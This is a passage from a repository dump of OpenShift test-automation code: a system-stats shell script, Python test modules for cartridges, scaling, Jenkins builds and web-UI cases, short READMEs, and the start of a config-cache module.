tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.39534884691238403, "alphanum_fraction": 0.39534884691238403, "avg_line_length": 42, "blob_id": "bbd81d61a3fca4c0d61cbdeeccc443396d4268f9", "content_id": "a658c4430ff47135c074d6997be55948e1445e96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 86, "license_type": "no_license", "max_line_length": 42, "num_lines": 2, "path": "/python-simple-cmd/README.md", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "This is a simple cmd app powered by python\n==========================================\n" }, { "alpha_fraction": 0.46860355138778687, "alphanum_fraction": 0.4901593327522278, "avg_line_length": 27.078947067260742, "blob_id": "369a5922932f97deb58ff84805b460f5b957adf1", "content_id": "a0bea3747b1fca150ce51af0f26d16fe64a0dd42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1067, "license_type": "no_license", "max_line_length": 88, "num_lines": 38, "path": "/automation/open/Longevity/record.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/sh\nstart_time=`date +%Y%m%d-%H%M%S`\nrootdev=`df -h|grep /dev/sda|awk '{print $1}'|cut -d/ -f 3`\n\n\ttime=`date +%Y%m%d-%H%M%S`\n\techo \"time: $time\"\n\techo \"\"\n\techo \"===========================Start ========= record===============================\"\n\techo \"****** 1. Filesystem info: ******\"\n\tdf -h|grep -B1 \"/$\"\n\techo\n\techo \"****** 2. MEMORY info: ******\"\n\t free -m |grep \"buffers\\/cache\"\n\techo \"\"\n\techo \"****** 3. Vmstat info: ******\"\n\techo\n\tvmstat 1 3\n\t#vmstat 1 3|tee -a vmstat-$start_time.log \n\techo\n\techo \"****** 4. Cpu consume top 3: ******\"\n\tps auxw|head -1;ps auxw|sort -rn -k3|head -3\n\techo\n\techo \"****** 5. Mem consume top 3: ******\"\n\techo\n\tps auxw|head -1;ps auxw|sort -rn -k4|head -3\n\techo\n\techo \"****** 6. Mongo and apache ******\"\n\techo\n\tpstree |egrep 'mongo|httpd'\n\techo\n\tpstree |grep mongod>/dev/null\n\tif [ $? -eq 0 ];then\n\techo \"****** 7. Mongo fds number ******\"\n\techo \"Mongo process fds: (/proc/`pidof mongod`/fd/)\"\n\tls /proc/`pidof mongod`/fd/|wc -l\n\techo\n\tfi\n\techo \"===========================End ========= record===============================\"\n" }, { "alpha_fraction": 0.49597424268722534, "alphanum_fraction": 0.5058373808860779, "avg_line_length": 38.11023712158203, "blob_id": "404bc0a376165c5054c6caf19004377c1e1449c2", "content_id": "7a261ff9ca3e22aac6b8548c05edf9960bf6e82d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4968, "license_type": "no_license", "max_line_length": 144, "num_lines": 127, "path": "/automation/open/testmodules/RT/cartridge/metrics_control_embedded_cartridge.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nMichal Zimen\[email protected]\nSept 24, 2012\n\n[US2105][US2110][US1386][[Runtime][cartridge]Control embedded Metrics\nhttps://tcms.engineering.redhat.com/case/167565/?from_plan=4962\n\"\"\"\n\nimport common\nimport rhtest\nimport OSConf\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = '[US1386][Runtime][cartridge]Control embedded Metrics'\n \n try:\n test_name = self.get_variant()\n except:\n self.info(\"WARN: Missing variant, used `php` as default\")\n test_name = 'php'\n\n self.info(\"VARIANT: %s\"%test_name)\n self.app_type = common.app_types[test_name]\n self.app_name = common.getRandomString(10)\n\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass MetricsControlEmbededCartridge(OpenShiftTest):\n def verify(self, str2verify):\n url = OSConf.get_app_url(self.app_name)+\"/metrics/\"\n return common.grep_web_page(url, str2verify)\n\n def test_method(self):\n self.add_step(\"Creating an application\",\n common.create_app,\n function_parameters = [ self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, False ],\n expect_description = 'The app should be created successfully',\n expect_return = 0)\n\n self.add_step('Embedding Metrics to the application',\n common.embed,\n function_parameters = [ self.app_name, \n 'add-%s' % ( common.cartridge_types['metrics']), \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd ],\n expect_description = 'Metrics cartridge should be embedded successfully',\n expect_return = 0)\n\n self.add_step(\n 'Ensuring the web page is available',\n self.verify,\n function_parameters = [ \"App Resource Data\"],\n expect_description = 'Metrics should be started',\n expect_return = 0)\n\n\n self.add_step(\n 'Stopping Metrics',\n 'rhc cartridge stop %s -a %s -l %s -p %s %s' % ( common.cartridge_types['metrics'], \n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'Metrics should be stopped',\n expect_return = 0)\n\n self.add_step(\n 'Ensuring the app is not available',\n self.verify,\n function_parameters = [\"Service Temporarily\"],\n expect_description = 'Metrics should be stopped',\n expect_return = 0 )\n\n self.add_step(\n 'Restarting Metrics',\n \"rhc cartridge restart %s -a %s -l %s -p '%s' %s\" % ( common.cartridge_types['metrics'], \n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'Metrics should be started',\n expect_return = 0)\n\n self.add_step(\n 'Ensuring the right status message of the started instance',\n self.verify,\n function_parameters = [\"App Resource Data\"],\n expect_description = 'Metrics should be started',\n try_count=3,\n try_interval=10,\n expect_return = 0)\n\n self.add_step(\n 'Removing Metrics cartridge',\n \"rhc cartridge remove %s -a %s -l %s -p '%s' --confirm %s\" % ( common.cartridge_types['metrics'],\n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'The Metrics cartridge should be removed',\n expect_return = 0)\n\n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(MetricsControlEmbededCartridge)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.576773464679718, "alphanum_fraction": 0.583256185054779, "avg_line_length": 33.38853454589844, "blob_id": "37bff30a32a254c2ad33b72ebc820cf9945269f4", "content_id": "e08ddd18360a571d8bf2fa35af734d029c7c9953", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5399, "license_type": "no_license", "max_line_length": 134, "num_lines": 157, "path": "/automation/open/testmodules/RT/scaling/nodejs_mysql_scaling.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\nimport fileinput\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info(\"[US2006][Runtime][rhc-cartridge]Embed mysql to scalable apps: nodejs\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = 'nodejs' + common.getRandomString()\n self.app_type = common.app_types[\"nodejs\"]\n self.random1 = common.getRandomString(10)\n \n common.env_setup()\n\n\n def finalize(self):\n pass\n\nclass NodejsScalingMysql(OpenShiftTest):\n\n def fill_mysql(self):\n time.sleep(20)\n app_url = OSConf.get_app_url(self.app_name)\n common.fetch_page(\"%s/data1.js\"% app_url)\n common.fetch_page(\"%s/data1.js\"% app_url)\n return 0\n\n def check_mysql_result(self, s_pattern):\n app_url = OSConf.get_app_url(self.app_name)\n url = \"%s/show.js\"% app_url\n return common.grep_web_page(url, s_pattern, delay=5, count=4)\n\n def update_mysql_credentials(self):\n'''\n mysql = OSConf.get_embed_info(self.app_name, common.cartridge_types['mysql'])\n \n self.info(\"mysql credentials: %s\"%mysql)\n\n try:\n self.info(\"Copy/modify template files\")\n fr = open(\"%s/../cartridge/app_template/mysql/server.js\"%WORK_DIR, 'r')\n s = fr.read()\n fr.close()\n\n s = s.replace(\"#mysql_host#\", mysql['url'])\n s = s.replace(\"#mysql_port#\", mysql['port'])\n s = s.replace(\"#mysql_user#\", mysql['username'])\n s = s.replace(\"#mysql_passwd#\", mysql['password'])\n s = s.replace(\"#mysql_dbname#\", mysql['database'])\n s = s.replace(\"#str_random1#\", self.random1)\n s = s.replace(\"#str_random2#\", self.random1)\n\n fw = open(\"./%s/server.js\" % self.app_name, 'w')\n fw.write(s)\n fw.close()\n except Exception as e:\n self.error(e)\n return False\n'''\n return True\n\n def test_method(self):\n self.add_step(\"Create a scalable %s app: %s\" % (self.app_type, self.app_name),\n common.create_app,\n function_parameters = [self.app_name, self.app_type, self.user_email, self.user_passwd, True, \"./\" + self.app_name, True],\n expect_description = \"App should be created successfully\",\n expect_return = 0)\n\n self.add_step(\"embed mysql to %s\" % self.app_name,\n common.embed,\n function_parameters = [ self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.user_email, self.user_passwd ],\n expect_return = 0)\n\n self.add_step(\"Changing MySQL credentials\",\n self.update_mysql_credentials,\n expect_description = \"Operation must be successfull\",\n expect_return = True)\n\n self.add_step(\"git push codes\",\n \"cd %s && git add . && git commit -am 'update app' && git push\" % self.app_name,\n expect_return = 0)\n\n self.add_step(\"Pollute data into MySql\",\n self.fill_mysql,\n expect_description = \"MySQL operation must be successfull\",\n expect_return = 0)\n\n self.add_step(\"Check MySql Result\",\n self.check_mysql_result,\n function_parameters = [self.random1],\n expect_description = \"MySQL operation must be successfull\",\n expect_return = 0)\n \n self.add_step(\"Scale-up the application via Rest API\",\n common.scale_up,\n function_parameters = [ self.app_name,],\n expect_description = \"Operation must be successfull\",\n expect_return = 0)\n \n for i in range(1,4):\n self.add_step(\"Check MySql Result - again\",\n self.check_mysql_result,\n function_parameters = [self.random1],\n expect_description = \"MySQL operation must be successfull\",\n expect_return = 0)\n\n self.add_step(\"Scale-down the application via Rest API\",\n common.scale_down,\n function_parameters = [ self.app_name,],\n expect_description = \"Operation must be successfull\",\n expect_return = 0,\n try_interval=5,\n try_count=6)\n\n self.add_step(\"Check MySql Result - again\",\n self.check_mysql_result,\n function_parameters = [self.random1],\n expect_description = \"MySQL operation must be successfull\",\n expect_return = 0)\n\n self.add_step(\"Remove mysql from %s\" % self.app_name,\n common.embed,\n function_parameters = [ self.app_name, \"remove-\" + common.cartridge_types[\"mysql\"] ],\n expect_description = \"Operation must be successfull\",\n expect_return = 0)\n\n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(NodejsScalingMysql)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6064879894256592, "alphanum_fraction": 0.6304654479026794, "avg_line_length": 29.483871459960938, "blob_id": "95c8f58266f9b82cb28c607b87bef8c215b3bcc5", "content_id": "67165966dc63c10a3dbc53f0777fdb39ee6bf23c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2836, "license_type": "no_license", "max_line_length": 211, "num_lines": 93, "path": "/automation/open/testmodules/UI/web/case_180947.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_180947.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass AddAllCartridgeToRubyOnRailsApp(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login()\n\n #create a jbosseap app\n ##web.create_app(\"rails\",\"rubyonrails\")\n web.go_to_create_app(\"rails\")\n web.input_by_id(\"application_name\", \"rubyonrails\")\n web.click_element_by_id(\"application_submit\")\n time.sleep(40)\n web.assert_text_equal_by_xpath('''Your application has been created. If you're new to OpenShift check out these tips for where to go next.''', '''//div[@id='content']/div/div/div/div[2]/div/section/p''')\n \n #go to app rubyonrails page and add cartridges\n web.add_cartridge(\"rubyonrails\", \"mongodb-2.2\")\n time.sleep(8)\n web.assert_text_equal_by_xpath(\"rhc app cartridge remove -a rubyonrails -c mongodb-2.2\",'''//pre[3]''') \n\n web.add_cartridge(\"rubyonrails\", \"cron-1.4\")\n web.assert_text_equal_by_xpath(\"Cron 1.4\",'''//div[@id='cartridge_type_']/h3''')\n\n\n web.add_cartridge(\"rubyonrails\",\"metrics-0.1\")\n web.assert_text_equal_by_xpath(\"OpenShift Metrics 0.1\",'''//div[@id='cartridge_type_']/h3''')\n\n web.add_cartridge(\"rubyonrails\",\"phpmyadmin-3.4\")\n web.assert_text_equal_by_xpath(\"phpMyAdmin 3.4\",'''//div[@id='cartridge_type_']/h3''')\n\n web.add_cartridge(\"rubyonrails\",\"rockmongo-1.1\")\n web.assert_text_equal_by_xpath(\"RockMongo 1.1\",'''//div[@id='cartridge_type_']/h3''')\n\n web.go_to_app_detail(\"rubyonrails\")\n web.click_element_by_xpath('''//a[contains(@href, '/building')]''')\n time.sleep(3)\n web.input_by_id(\"application_name\", \"jenkins\")\n web.click_element_by_id(\"application_submit\")\n time.sleep(150) \n web.assert_text_equal_by_xpath(\"Building your Application\",'''//div[@id='content']/div/div/div/div[2]/div/h1''')\n\n\n\n #delete a rubyonrails app\n web.delete_app(\"rubyonrails\")\n #delete a jenkins app\n web.delete_last_app(\"jenkins\")\n\n\n self.tearDown()\n\n return self.passed(\" case_180947--AddAllCartridgeToRubyOnRailsApp passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AddAllCartridgeToRubyOnRailsApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_180947.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6425855755805969, "alphanum_fraction": 0.6692014932632446, "avg_line_length": 19.91666603088379, "blob_id": "d81907d897e183e0ffe5b8795cb67004d3f0d6ed", "content_id": "449047c0d1be16690ab9cafd51985ada975a5b66", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 293, "license_type": "no_license", "max_line_length": 53, "num_lines": 12, "path": "/sblog/README.md", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "Django-Simple-Blog\r\n==================\r\n\r\nsimple-Blog dajngo版\r\n\r\n使用的环境: fedora 17 + django1.4 + python2.7 + sqlite3\r\n\r\n前端使用的 bootstrap + jquery\r\n\r\n依赖包:\r\n* python-markdown, $ sudo yum install python-markdown\r\n* python-pygments, $ sudo yum install python-pygments\r\n" }, { "alpha_fraction": 0.5215947031974792, "alphanum_fraction": 0.5313323140144348, "avg_line_length": 40.1698112487793, "blob_id": "5dde80c9b7ae68fb9e382ea62eed45604dcf775f", "content_id": "d6013a997b7c6e6750d8398e5de273560c1fab91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8729, "license_type": "no_license", "max_line_length": 195, "num_lines": 212, "path": "/automation/open/testmodules/RT/cartridge/jenkins_after_alter_namespace.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n\nRefactoring:\nAttila Nagy\[email protected]\nJun 12, 2012\n\n[US1178 & US1034] [rhc-cartridge] jenkins build after alter domain namespace\nhttps://tcms.engineering.redhat.com/case/122370/\n\"\"\"\nimport os\nimport re\nimport rhtest\nimport common\nimport OSConf\nfrom shutil import rmtree\nimport fileinput\n\nclass OpenShiftTest(rhtest.Test):\n \n def initialize(self):\n self.summary = \"[US1178 & US1034] [rhc-cartridge] jenkins build after alter domain namespace\"\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"Missing OPENSHIFT_test_name, used `php` as default.\")\n self.test_variant = \"zend\"\n\n self.domain_name = common.get_domain_name()\n self.new_domain_name = common.getRandomString(10)\n self.app_name = self.test_variant.split('-')[0] + common.getRandomString(10)\n self.git_repo = \"./%s\" % (self.app_name)\n self.app_type = common.app_types[self.test_variant]\n self.jenkins_name = \"jen\"+common.getRandomString(7)\n self.sshkey_backup_dir = \"/tmp/\"+common.getRandomString(10)\n os.mkdir(self.sshkey_backup_dir)\n self.deployment_configuration = {\n \"php\": { \"index\" : \"php/index.php\" },\n \"zend\" : { \"index\" : \"php/index.php\" },\n \"jbossas\" : { \"index\" : \"src/main/webapp/index.html\" },\n \"jbosseap\" : { \"index\" : \"src/main/webapp/index.html\" },\n \"jbossews\" : { \"index\" : \"src/main/webapp/index.html\" },\n \"jbossews2\" : { \"index\" : \"src/main/webapp/index.html\" },\n \"python\" : { \"index\" : \"wsgi/application\" },\n \"ruby\" : { \"index\" : \"config.ru\" },\n \"perl\" : { \"index\" : \"perl/index.pl\" },\n \"nodejs\" : { \"index\" : \"index.html\" },\n }\n self.deployment_configuration[\"ruby-1.9\"] = self.deployment_configuration[\"ruby\"]\n self.random_string = common.getRandomString()\n common.env_setup()\n\n\n def finalize(self):\n rmtree(self.git_repo)\n #\"10.Move ssh key back\",\n #common.command_get_status(\"test -f %s/id_rsa -a -f %s/id_rsa.pub && rm -f ~/.ssh/id_rsa* && mv %s/id_rsa* ~/.ssh/\"%(self.sshkey_backup_dir,self.sshkey_backup_dir,self.sshkey_backup_dir))\n #rmtree(self.sshkey_backup_dir)\n common.alter_domain(self.domain_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n #common.update_sshkey()\n if self.test_variant in ( \"jbosseap\", \"jbossas\", \"jbossews\",\"jbossews2\"):\n if self.get_run_mode() == \"DEV\":\n pass\n #common.change_node_profile(\"small\")\n\n\nclass JenkinsAfterAlterNamespace(OpenShiftTest):\n \n def deploy_changes(self, source, destination):\n try:\n index_file = self.git_repo + \"/\" + self.deployment_configuration[self.test_variant][\"index\"]\n self.info(\"Editing: \" + index_file)\n for line in fileinput.input(index_file, inplace = True):\n print re.sub(source, destination, line),\n except:\n fileinput.close()\n self.info(\"IO error\")\n return False\n fileinput.close()\n \n deployment_steps = [\n \"cd %s\" % self.app_name,\n \"git commit -a -m testing\",\n ]\n return common.command_getstatusoutput(\" && \".join(deployment_steps))\n \n def test_method(self):\n self.info(\"=============================\")\n self.info(\"1. Create an jenkins app\")\n self.info(\"=============================\")\n ret_code = common.create_app(\n self.jenkins_name, common.app_types[\"jenkins\"], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n clone_repo = False\n )\n self.assert_equal(ret_code, 0, \"Failed to create jenkins app\")\n\n self.info(\"=============================\")\n self.info(\"2. Create an app\")\n self.info(\"=============================\")\n ret_code = common.create_app(\n self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n )\n self.assert_equal(ret_code, 0, \"Failed to create %s app: %s\" % (self.app_type, self.app_name))\n \n if self.test_variant in ( \"jbosseap\", \"jbossas\",\"jbossews\", \"jbossews2\"):\n if self.get_run_mode() == \"DEV\":\n pass\n #self.info(\"Changing node profile to 'medium'\")\n #common.change_node_profile(\"medium\")\n \n self.info(\"=============================\")\n self.info(\"3. Embed jenkins client to the app\")\n self.info(\"=============================\")\n ret_code = common.embed(\n self.app_name, \n \"add-\" + common.cartridge_types[\"jenkins\"], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n )\n self.assert_equal(ret_code, 0, \"Failed to embed jenkins client to the app\")\n \n # No need to update SSH key pair now, since it is associated with a user \n # rather than a domain\n\n ''' \n self.info(\"=============================\")\n self.info(\"4. Backup the libra ssh key and create new key pair\")\n self.info(\"=============================\")\n ret_code = common.command_get_status(\"mv ~/.ssh/id_rsa* %s/ && ssh-keygen -t rsa -N '' -f ~/.ssh/id_rsa\" % ( self.sshkey_backup_dir )),\n '''\n\n self.info(\"=============================\")\n self.info(\"5. Alter domain\")\n self.info(\"=============================\")\n ret_code = common.alter_domain(\n self.new_domain_name, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n )\n self.assert_equal(ret_code, 0, \"Failed to alter domain name\")\n\n '''\n self.info(\"=============================\")\n self.info(\"6. Update ssh key\")\n self.info(\"=============================\")\n ret_code = common.update_sshkey()\n self.assert_equal(ret_code, 0, \"Failed to update ssh key\")\n '''\n\n self.info(\"=============================\")\n self.info(\"7.Change git config file in git repo\")\n self.info(\"=============================\")\n ret_code = common.command_get_status(\"sed -i -e 's/%s/%s/g' %s/.git/config\" % ( self.domain_name, self.new_domain_name, self.git_repo ))\n self.assert_equal(ret_code, 0, \"Failed to change git config file in git repo\")\n \n self.info(\"=============================\")\n self.info(\"8. Make some change in the git repo and git push to trigger jenkins build job\")\n self.info(\"=============================\")\n (ret_code, output) = self.deploy_changes(\"Welcome to OpenShift\", self.random_string)\n self.debug(output)\n ret = common.trigger_jenkins_build(self.app_name)\n self.assert_equal(ret, True, \"Failed to git push the changes to trigger jenkins build job\")\n \n \n self.info(\"=============================\")\n self.info(\"9. Check the jenkins build url\")\n self.info(\"=============================\")\n ret_code = common.grep_web_page(\n str(OSConf.default.conf[\"apps\"][self.app_name][\"embed\"][common.cartridge_types[\"jenkins\"]][\"url\"]).replace(self.domain_name, self.new_domain_name), \n \"Last Successful Artifacts\", \n \"-L -k -H 'Pragma: no-cache' -u %s:%s\" % (OSConf.default.conf[\"apps\"][self.jenkins_name][\"username\"], OSConf.default.conf[\"apps\"][self.jenkins_name][\"password\"]),\n 60, 10\n )\n self.assert_equal(ret_code, 0, \"Job URL must be accessed successfully\")\n\n self.info(\"=============================\")\n self.info(\"10. Check if the changes take effect\")\n self.info(\"=============================\")\n ret_code = common.grep_web_page(\n str(OSConf.get_app_url(self.app_name)).replace(self.domain_name, self.new_domain_name), \n self.random_string, \n \"-L -k -H 'Pragma: no-cache'\", \n 15, 6\n )\n self.assert_equal(ret_code, 0, \"Changes must be deployed\")\n \n return self.passed(\"[US1178 & US1034] [rhc-cartridge] jenkins build after alter domain namespace\")\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JenkinsAfterAlterNamespace)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.7110157608985901, "alphanum_fraction": 0.725321888923645, "avg_line_length": 24.88888931274414, "blob_id": "c82255dde80171746f51a100c9b435598ab52b13", "content_id": "7d532f09be9ff090c78391d6ad0ce820eefec6ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 699, "license_type": "no_license", "max_line_length": 113, "num_lines": 27, "path": "/automation/open/testmodules/RT/hot_deploy/perl_scaling_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nSept 26, 2012\n\"\"\"\nimport rhtest\nimport common\nfrom perl_without_jenkins import PerlHotDeployWithoutJenkins\n\nclass PerlScalingHotDeployWithoutJenkins(PerlHotDeployWithoutJenkins):\n def __init__(self, config):\n PerlHotDeployWithoutJenkins.__init__(self, config)\n self.config.scalable = True\n self.config.summary = \"[US2443] Hot deployment support for scailing application - perl - without jenkins\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PerlScalingHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6085126399993896, "alphanum_fraction": 0.6323667168617249, "avg_line_length": 26.753246307373047, "blob_id": "eef2da6e51197545df9b843a556c7080f774d6e2", "content_id": "72752f42469b5811a60d485ee9a0b4cd809b7be0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2138, "license_type": "no_license", "max_line_length": 211, "num_lines": 77, "path": "/automation/open/testmodules/UI/web/case_180950.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_180950.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CreateSpringeap6App(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login()\n\n #create a springeap6 app\n #web.create_app(\"springeap6\",\"springeap\")\n web.go_to_create_app(\"springeap6\")\n web.input_by_id(\"application_name\", \"springeap\")\n web.click_element_by_id(\"application_submit\")\n time.sleep(50)\n web.assert_text_equal_by_xpath('''Your application has been created. If you're new to OpenShift check out these tips for where to go next.''', '''//div[@id='content']/div/div/div/div[2]/div/section/p''')\n \n #check the \"appurl\" link\n time.sleep(300)\n web.go_to_app_detail(\"springeap\")\n web.click_element_by_xpath('''//div[@id='content']/div/div/div/div[2]/nav/div/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath(\"Spring MVC Starter Application\",'''//title''') \n\n #delete a springeap app\n web.go_to_app_detail(\"springeap\")\n time.sleep(2)\n web.click_element_by_link_text(\"Delete this application\")\n time.sleep(1)\n web.click_element_by_id(\"application_submit\")\n time.sleep(40)\n web.go_to_app_detail(\"springeap\")\n web.assert_text_equal_by_xpath(\"Sorry, but the page you were trying to view does not exist.\", '''//article/div/p''')\n\n\n self.tearDown()\n\n return self.passed(\" case_180950--CreateSpringeap6App passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CreateSpringeap6App)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_180950.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5367565155029297, "alphanum_fraction": 0.5443044900894165, "avg_line_length": 35.53009796142578, "blob_id": "7e3f77944eed093266ff96d7da81defab746596f", "content_id": "2329641c81a108e3c8d30bf1c8f9fc6a4da71135", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18813, "license_type": "no_license", "max_line_length": 148, "num_lines": 515, "path": "/automation/open/lib/OSConf.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "# OpenShift Conf File Operator\n# [email protected]\n# 2011-11-04\n#\nimport os, commands, re\nimport cPickle as pickle\nimport openshift\nfrom helper import *\nimport json\n\n\"\"\"\nNote:\n Access to cached object must be performed only via functions, not directly \n through user object like:\n passwd = OSConf.default['sshkeky']['default]\n but\n passwd = OSConf.get_ssh_key('default')\n\n If such function doesn't exist, please create it. It will be more easier for\n maintanance.\n\"\"\"\n\n\nclass OSConf:\n \"\"\"Class for handling cache of openshift user with all of his settings.\"\"\"\n\n def __init__(self, OSConf_dump = None):\n \"\"\"Tries to load cache file. If whatever error occurs it will create\n a new one\"\"\"\n if OSConf_dump is None:\n self.conf_file = get_cache_file()\n else:\n self.conf_file = OSConf_dump\n try:\n self.load_conf()\n except Exception as e:\n log.warn(\"Unable to load cache: %s\"% e)\n initial_conf(self)\n log.warn(\"New cache has been initialized\")\n\n def load_conf(self):\n f = file(self.conf_file, 'rb')\n self.conf = pickle.load(f)\n f.close()\n\n def dump_conf(self):\n oldumask = os.umask(0000)\n f = file(self.conf_file, 'wb')\n pickle.dump(self.conf, f, True)\n f.close()\n os.umask(oldumask)\n\nglobal default\ndefault = None\n\ndef _get_default():\n \"\"\" Returns the content of pickle file if exists. Otherwise it will create\n a new instance of OSConf class with initialization.\"\"\"\n global default\n if default is None:\n default = OSConf()\n return default\n\ndef initial_conf(user=None):\n \"\"\" This function is called, when the cache file doesn't exist.\n * It will try to set up the content.\n * Creates a new cache file.\n @return [Hash] newly initiated object with all of the information\n \"\"\"\n if user is None:\n user = _get_default()\n if ('OPENSHIFT_user_email' not in os.environ) or ('OPENSHIFT_user_passwd' not in os.environ):\n log.error(\"Environment Variables OPENSHIFT_* Not Found.\")\n log.error(\"Please check these ENV var: OPENSHIFT_user_email OPENSHIFT_user_passwd\")\n return -1\n os.environ[\"HOME\"] = os.path.expanduser(\"~\")\n if os.path.exists(user.conf_file):\n os.remove(user.conf_file)\n apps = {}\n user.conf = {}\n try:\n user.conf = setup_by_rest()\n rhlogin = {\n 'email' : os.environ['OPENSHIFT_user_email'], \n 'password': os.environ['OPENSHIFT_user_passwd']}\n user.conf['rhlogin'] = rhlogin\n\n except Exception as e: #we will propagate exception to upper level\n raise e\n finally:\n user.conf['apps'] = apps # we need this for future accessing the empty cache\n user.dump_conf()\n\n return 0\n\n\ndef _initial_sshkey():\n \"\"\" Returns {} if success otherwise returns None \"\"\"\n conf = {}\n (user_email, user_passwd) = get_default_rhlogin()\n\n #let's try it with REST API\n rest = 